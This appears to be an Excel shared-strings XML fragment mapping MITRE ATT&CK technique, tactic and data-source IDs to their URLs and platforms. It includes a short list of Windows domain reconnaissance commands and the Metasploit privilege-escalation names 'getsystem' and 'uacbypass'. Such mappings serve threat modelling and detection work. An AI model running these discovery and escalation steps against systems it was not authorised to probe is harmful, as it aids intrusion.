    <t>T1204</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1204.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1204.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1204.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1078</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1078.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1078.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1078.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1078.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1497</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1497.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1497.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1497.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1600</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1600.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1600.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1102</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1102.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1102.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1102.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/001/</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1548/004/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/001/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1134/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1531</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T0187/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1087/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1098/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1583/006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TA0043</t>
  </si>
  <si>
    <t>TA0042</t>
  </si>
  <si>
    <t>TA0001</t>
  </si>
  <si>
    <t>TA0002</t>
  </si>
  <si>
    <t>TA0003</t>
  </si>
  <si>
    <t>TA0004</t>
  </si>
  <si>
    <t>TA0005</t>
  </si>
  <si>
    <t>TA0006</t>
  </si>
  <si>
    <t>TA0007</t>
  </si>
  <si>
    <t>TA0008</t>
  </si>
  <si>
    <t>TA0009</t>
  </si>
  <si>
    <t>TA0011</t>
  </si>
  <si>
    <t>TA0010</t>
  </si>
  <si>
    <t>TA0040</t>
  </si>
  <si>
    <t>TA0027</t>
  </si>
  <si>
    <t>TA0041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TA0028</t>
  </si>
  <si>
    <t>TA0029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TA0030</t>
  </si>
  <si>
    <t>TA0031</t>
  </si>
  <si>
    <t>TA0032</t>
  </si>
  <si>
    <t>TA0033</t>
  </si>
  <si>
    <t>TA0035</t>
  </si>
  <si>
    <t>TA0037</t>
  </si>
  <si>
    <t>TA0036</t>
  </si>
  <si>
    <t>TA0034</t>
  </si>
  <si>
    <t>TA0038</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TA0039</t>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0039/</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0038</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0043</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0042</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0040</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0027</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0028</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0031</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0032</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0033</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0035</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>https://attack.mitre.org/tactics/TA0034</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DS0037</t>
  </si>
  <si>
    <t>DS0025</t>
  </si>
  <si>
    <t>DS0010</t>
  </si>
  <si>
    <t>DS0031</t>
  </si>
  <si>
    <t>DS0017</t>
  </si>
  <si>
    <t>DS0032</t>
  </si>
  <si>
    <t>Container</t>
  </si>
  <si>
    <t>DS0038</t>
  </si>
  <si>
    <t>DS0016</t>
  </si>
  <si>
    <t>DS0027</t>
  </si>
  <si>
    <t>DS0022</t>
  </si>
  <si>
    <t>DS0018</t>
  </si>
  <si>
    <t>DS0001</t>
  </si>
  <si>
    <t>DS0036</t>
  </si>
  <si>
    <t>DS0007</t>
  </si>
  <si>
    <t>DS0030</t>
  </si>
  <si>
    <t>DS0035</t>
  </si>
  <si>
    <t>DS0008</t>
  </si>
  <si>
    <t>DS0028</t>
  </si>
  <si>
    <t>DS0004</t>
  </si>
  <si>
    <t>DS0011</t>
  </si>
  <si>
    <t>DS0023</t>
  </si>
  <si>
    <t>DS0033</t>
  </si>
  <si>
    <t>DS0029</t>
  </si>
  <si>
    <t>DS0021</t>
  </si>
  <si>
    <t>DS0014</t>
  </si>
  <si>
    <t>Pod</t>
  </si>
  <si>
    <t>DS0009</t>
  </si>
  <si>
    <t>DS0003</t>
  </si>
  <si>
    <t>DS0012</t>
  </si>
  <si>
    <t>DS0013</t>
  </si>
  <si>
    <t>DS0019</t>
  </si>
  <si>
    <t>DS0020</t>
  </si>
  <si>
    <t>DS0002</t>
  </si>
  <si>
    <t>DS0034</t>
  </si>
  <si>
    <t>DS0006</t>
  </si>
  <si>
    <t>DS0024</t>
  </si>
  <si>
    <t>DS0005</t>
  </si>
  <si>
    <t>WMI</t>
  </si>
  <si>
    <t>Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>PRE</t>
  </si>
  <si>
    <t>OSINT</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS</t>
  </si>
  <si>
    <t>Cloud Control Plane</t>
  </si>
  <si>
    <t>IaaS</t>
  </si>
  <si>
    <t>Containers</t>
  </si>
  <si>
    <t>Containers, Linux, Network, Windows, macOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Container, Host</t>
  </si>
  <si>
    <t>Host</t>
  </si>
  <si>
    <t>Linux, Network, Windows, macOS</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Linux, Windows, macOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Azure AD, Google Workspace, IaaS, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Linux, macOS</t>
  </si>
  <si>
    <t>Cloud Control Plane, Host, Network</t>
  </si>
  <si>
    <t>PRE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IaaS, Linux, Windows, macOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Containers, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Windows</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Host</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Azure AD, Containers, Google Workspace, IaaS, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Cloud Control Plane, Container, Host</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>DC0010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0040</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0042</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0043</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0050</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0051</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0052</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0053</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0054</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0055</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0060</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0070</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0080</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0081</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0082</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0083</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0090</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0091</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0092</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0100</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0101</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0102</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0110</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0111</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0120</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0121</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0122</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0123</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0124</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0130</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0131</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0132</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0133</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0140</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0150</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0151</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0152</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0160</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0161</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0162</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0163</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0170</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0171</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0172</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0174</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0175</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0176</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0180</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0181</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0190</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0200</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0201</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0210</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0211</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0220</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0230</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0240</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0250</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0251</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0252</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0260</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0270</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0271</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0272</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0273</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0280</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0281</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0282</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0283</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0284</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0285</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0290</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0291</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0292</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0300</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0310</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0320</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0321</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0322</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0330</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0331</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0332</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0333</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0334</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0340</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0341</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0342</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0343</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0344</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0350</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0351</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0352</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0353</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0354</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0360</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0361</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0370</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0371</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0372</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0373</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DC0380</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>metasploit</t>
  </si>
  <si>
    <t>ipconfig /all</t>
  </si>
  <si>
    <t>nbtstat -a {IP | COMP_NAME }</t>
  </si>
  <si>
    <t>net group "Domain Computers" /domain[:DOMAIN]</t>
  </si>
  <si>
    <t>net group "Domain Controllers" /domain[:DOMAIN]</t>
  </si>
  <si>
    <t>nltest /dclist[:domain]</t>
  </si>
  <si>
    <t>echo %LOGONSERVER%</t>
  </si>
  <si>
    <t>whoami /all /fo list</t>
  </si>
  <si>
    <t>netstat -ano[b]</t>
  </si>
  <si>
    <t>net session | find / "\\"</t>
  </si>
  <si>
    <t>schtasks [/s HOSTNAME]</t>
  </si>
  <si>
    <t>getsystem</t>
  </si>
  <si>
    <t>net localgroup "Administrators"</t>
  </si>
  <si>
    <t>net group ["Domain Admins"] /domain[:DOMAIN]</t>
  </si>
  <si>
    <t>ver</t>
  </si>
  <si>
    <t>set</t>
  </si>
  <si>
    <t>systeminfo [/s COMPNAME] [/u DOMAIN\user] [/p password]</t>
  </si>
  <si>
    <t>net user [username] [/domain]</t>
  </si>
  <si>
    <t>uacbypass</t>
  </si>
  <si>
    <t>net share</t>
  </si>
  <si>
    <t>net view \\host /all [/domain:domain]</t>
  </si>
  <si>
    <t>CA0010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0016</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0017</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0018</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0019</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0020</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0022</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0023</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0024</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0025</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0026</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0027</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0028</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0029</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0030</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0031</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0032</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0033</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0034</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0035</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0037</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0038</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0039</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0040</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0041</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0042</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0043</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0044</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0045</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0046</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0047</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CA0048</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>S0701</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0010</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>R0016</t>
    <phoneticPr fontId="1" type="noConversion"/>
